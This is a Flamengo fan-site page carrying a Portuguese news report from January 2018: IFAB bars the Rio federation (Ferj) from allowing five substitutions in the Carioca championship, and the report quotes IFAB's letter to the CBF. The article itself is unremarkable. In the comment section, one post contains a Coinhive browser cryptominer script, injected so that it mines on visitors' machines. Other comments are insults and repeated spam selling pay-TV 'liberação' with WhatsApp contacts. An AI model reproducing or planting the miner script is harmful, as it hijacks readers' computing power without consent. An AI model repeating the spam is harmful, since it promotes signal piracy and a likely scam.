23/1/2018 10:00

Comitê Internacional de Arbitragem proíbe cinco substituições no Carioca

Ifab (na sigla em inglês) afirma que competições organizadas pela CBF não podem ter mais de três substituições; como Ferj responde à CBF, vai parar com as cinco substituições a partir da 4ª rodada

Comitê Internacional de Arbitragem proíbe cinco substituições no Carioca

A Federação de Futebol do Estado do Rio de Janeiro (Ferj) não poderá deixar que os jogos de suas competições tenham até cinco substituições. O Comitê Internacional das Associações de Futebol (Ifab, na sigla em inglês) não permite que um time modifique sua equipe mais de três vezes na mesma partida. A determinação será a partir da quarta rodada da Taça Guanabara, que será realizada neste fim de semana.



Como a Ferj responde à CBF, que por sua vez tem que obedecer as regras da Ifab, o diretor de competições Marcelo Vianna divulgou uma nota oficial, em que decreta o fim das mais de três substituições.

A Ifab, por sua vez, havia enviado um documento para Walter Feldman, secretário-geral da CBF. Nele, o secretário do comitê pede que a entidade máxima do futebol brasileiro esclareça a situação. Veja abaixo.

"Caro senhor Feldman,

Temos recebidos diversos pedidos da imprensa sobre uma aparente decisão da Federação de Futebol do Rio de Janeiro que permite até cinco substituições, incluindo os times das divisões principais.

Como sabe, as Regras do Jogo foram atualizadas na última edição 2017/2018, permitindo que as associações nacionais façam mais de três substituições, exceto nas competições envolvendo os times principais dos clubes da divisão principal, ou um time internacional.

Poderia explicar melhor este assunto e nos dar informações relevantes?

Já agradeço o retorno sobre o assunto, até para podermos responder a mídia da melhor forma possível."

2718 visitas - Fonte: Globoesporte.com


Instale o app do Flamengo para Android, receba notícias e converse com outros flamenguistas no Fórum!

Mais notícias do Flamengo

Notícias de contratações do Flamengo
Notícias mais lidas

Comentários do Facebook -




esses merdas não sabem nada de futebol o mundo do esporte não pode aceitar isso vamos nos mobilizar já.

CHEGA SER IMPRESIONANTE FEDERAÇÃO FAZ PRA PREJUDICAR O MENGÃO. NÓS estamos precisando de q DR.Rubens saia da Federação Carioca junto com Sr.eurico,SAIÃO DO FUTEBOOL. BRASILEIRO, ADMINISTRARAM COM O FÍGADO....Choooooooo

gabriel silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Rafael Pontes     

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias do Mengão

Próximo Jogo - Brasileiro

Quarta - 21:45 - Maracanã - Premiere
Flamengo
São Paulo

Último jogo - Brasileiro

Quarta - 21:00 - Allianz Parque
Palmeiras
1 1
Flamengo